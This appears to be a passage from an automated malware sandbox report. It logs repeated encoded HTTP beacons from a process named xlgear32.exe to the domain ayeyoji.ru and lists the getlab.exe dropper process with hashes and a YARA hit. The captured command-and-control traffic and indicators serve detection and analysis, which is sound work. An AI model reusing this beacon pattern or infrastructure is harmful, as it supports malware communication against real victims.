                                                                        18192.168.2.449828185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:29.087987900 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:30.470597982 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:30 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.449833185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:30.713514090 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:32.109592915 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:31 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Nov 30, 2024 02:34:32.217515945 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:32.691086054 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.449839185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:32.932424068 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:34.309799910 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.2.449844185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:34.631422043 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:35.942440033 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:35 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.2.449849185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:36.181797981 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:37.661833048 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.2.449853185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:37.905771017 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:39.304721117 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:39 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.2.449858185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:39.541003942 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:40.919466972 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:40 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Nov 30, 2024 02:34:41.030101061 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:41.502412081 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        25192.168.2.449864185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:41.744410038 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:43.116338015 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:42 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        26192.168.2.449869185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:43.353902102 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:44.735771894 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:44 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        27192.168.2.449873185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:44.962877989 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:46.404664040 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        28192.168.2.449878185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:46.642376900 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:48.037117958 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:47 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        29192.168.2.449883185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:48.275427103 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:49.693346024 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        30192.168.2.449888185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:49.931793928 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:51.306162119 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:51 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        31192.168.2.449891185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:51.609775066 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:53.020618916 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:52 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.449896185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:53.260059118 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:54.635322094 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:54 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        33192.168.2.449901185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:54.876821995 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:56.331507921 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:56 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        34192.168.2.449905185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:56.577852964 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:57.905153990 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:57 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        35192.168.2.449910185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:58.136842012 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:34:59.511039972 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:34:59 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        36192.168.2.449915185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:34:59.749279976 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:35:01.180387020 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:35:00 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        37192.168.2.449920185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:35:01.428373098 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:35:02.800364017 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:35:02 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        38192.168.2.449923185.208.158.202803320C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 02:35:03.045042992 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1
                                                                        Host: ayeyoji.ru
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Nov 30, 2024 02:35:04.463563919 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 30 Nov 2024 01:35:04 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:20:32:55
                                                                        Start date:29/11/2024
                                                                        Path:C:\Users\user\Desktop\getlab.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\getlab.exe"
                                                                        Imagebase:0x400000
                                                                        File size:3'599'599 bytes
                                                                        MD5 hash:15BD54ED3324A464C1DEB1A883E7649E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:1
                                                                        Start time:20:32:55
                                                                        Start date:29/11/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp" /SL5="$1043E,3351432,54272,C:\Users\user\Desktop\getlab.exe"
                                                                        Imagebase:0x400000
                                                                        File size:704'000 bytes
                                                                        MD5 hash:A0CFF52B882184452424B6E618FA061B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.2936760839.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
